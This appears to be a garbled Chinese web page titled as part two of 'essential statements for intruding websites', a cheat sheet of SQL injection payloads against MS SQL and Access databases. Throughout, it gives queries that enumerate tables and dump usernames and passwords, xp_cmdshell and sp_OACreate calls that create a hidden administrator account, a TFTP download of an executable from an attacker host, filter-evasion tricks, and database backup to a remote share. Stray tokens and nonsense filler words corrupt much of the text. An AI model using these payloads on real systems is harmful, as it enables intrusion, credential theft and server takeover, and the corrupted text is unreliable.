入侵网站必备经典语句(下)

  • 时间:
  • 浏览:0

得到那末 admin的那末 字段,假设为 user_blank>_id

  and 0(select top 1 name from

  bbs.dbo.syscolumns where id=18779569 and name not in

  (id,...)) 来暴出你你这种的字段

  and 0_id from BBS.dbo.admin where username>1)

  都都上能 得到用户名

  依次都都上能 得到_blank>密码。。。。。假设存在user_blank>_id username ,password 等字段

  and 0(select count(*) from master.dbo.sysdatabases where

  name>1 and dbid=6)

  and 0 (select top 1 name from

  bbs.dbo.sysobjects where xtype=U) 得到表名

  and 0(select top 1 name from

  bbs.dbo.sysobjects where xtype=U and name not in(Address))

  and

  0(select count(*) from bbs.dbo.sysobjects where xtype=U and name=admin

  and uid>(str(id))) 判断id值

  and 0(select top 1 name from

  BBS.dbo.syscolumns where id=773577794) 所有字段

  ?id=-1 union select

  1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin

  ?id=-1 union select

  1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union,access也好用)

  得到WEB路径

  ;create table [dbo].[swap] ([swappass][char](255));--

  and (select top 1

  swappass from swap)=1--

  ;CREATE TABLE newtable(id int IDENTITY(1,1),paths

  varchar(5000)) Declare @test varchar(20) exec master..xp_blank>_regread

  @rootkey=HKEY_blank>_LOCAL_blank>_MACHINE, @key=SYSTEMCurrentControlSet

  ServicesW3SVCParametersVirtual Roots, @value_blank>_name=/, values=@test

  OUTPUT insert into paths (path) values(@test)--

  ;use ku1;--

  ;create

  table cmd (str image);-- 建立image类型的表cmd

  存在xp_blank>_cmdshell的测试过程:

  ;exec master..xp_blank>_cmdshell dir

  ;exec

  master.dbo.sp_blank>_addlogin jiaoniang$;-- 加SQL帐号

  ;exec

  master.dbo.sp_blank>_password null,jiaoniang$,1866574;--

  ;exec

  master.dbo.sp_blank>_addsrvrolemember jiaoniang$Content$nbsp;sysadmin;--

  ;exec

  master.dbo.xp_blank>_cmdshell net user jiaoniang$Content$nbsp;1866574 /workstations:*

  /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--

  ;exec

  master.dbo.xp_blank>_cmdshell net localgroup administrators jiaoniang$

  /add;--

  exec master..xp_blank> _servicecontrol start, schedule

  启动_blank>服务

  exec master..xp_blank>_servicecontrol start, server

  ;

  DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC

  SP_blank>_OAMETHOD @shell,run,null, C:WINNTsystem32cmd.exe /c net user

  jiaoniang$Content$nbsp;1866574 /add

  ;DECLARE @shell INT EXEC SP_blank>_OACREATE

  wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null,

  C:WINNTsystem32cmd.exe /c net localgroup administrators jiaoniang$Content$nbsp;/add

  ;

  exec master..xp_blank>_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件

  ;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:

  ;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:

  ;declare @a;set @a=db_blank>_name();backup database @a to

  disk=你的IP你的共享目录bak.dat

  机会被限制则都都上能 。

  select * from openrowset

  (_blank>sqloledb,server;sa;,select OK! exec master.dbo.sp_blank>_addlogin

  hax)

  查询构造:

  SELECT * FROM news WHERE id=... AND topic=... AND .....

  adminand 1=(select count(*) from [user] where username=victim and

  right(left(userpass,01),1)=1) and userpass

  select 123;--

  ;use

  master;--

  :a or name like fff%;-- 显示有那末 叫ffff的用户哈。

  and 1(select

  count (email) from [user]);--

  ;update [users] set email=(select top 1 name

  from sysobjects where xtype=u and status>0) where name=ffff;--

  ;update

  [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad)

  where name=ffff;--

  ;update [users] set email=(select top 1 name from

  sysobjects where xtype=u and id>581577110) where name=ffff;--

  ;update

  [users] set email=(select top 1 count(id) from password) where name=ffff;--

  ;update [users] set email=(select top 1 pwd from password where id=2) where

  name=ffff;--

  ;update [users] set email=(select top 1 name from password

  where id=2) where name=ffff;--

  底下的语句是得到_blank>数据库中的第那末 用户表,并把表名放到去ffff用户的邮箱字段中。

  通过查看ffff的用户资料可得第那末 用表叫ad

  否则根据表名ad得到你你这种 表的ID 得到第三个小表的名字

  insert into

  users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

  char(0x63)+char (0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--

  insert

  into users values( 667,123,123,0xffff)--

  insert into users values ( 123,

  admin--, password, 0xffff)--

  ;and user>0

  ;and (select count(*) from

  sysobjects)>0

  ;and (select count(*) from mysysobjects)>0

  //为access_blank>数据库

  枚举出数据表名

  ;update aaa set aaa=(select top 1

  name from sysobjects where xtype=u and status>0);--

  这是将第那末 表名更新到aaa的字段处。

  读出第那末 表,第三个小表都都上能 那末 读出来(在条件后加上 and name刚才得到的表名)。

  ;update aaa set

  aaa=(select top 1 name from sysobjects where xtype=u and status>0 and

  namevote);--

  否则id=1552 and exists(select * from aaa where aaa>5)

  读出第三个小表,那末 个的读出,直到那末为止。

  读字段是那末 :

  ;update aaa set aaa=(select top 1

  col_blank>_name (object_blank>_id(表名),1));--

  否则id=152 and

  exists(select * from aaa where aaa>5)出错,得到字段名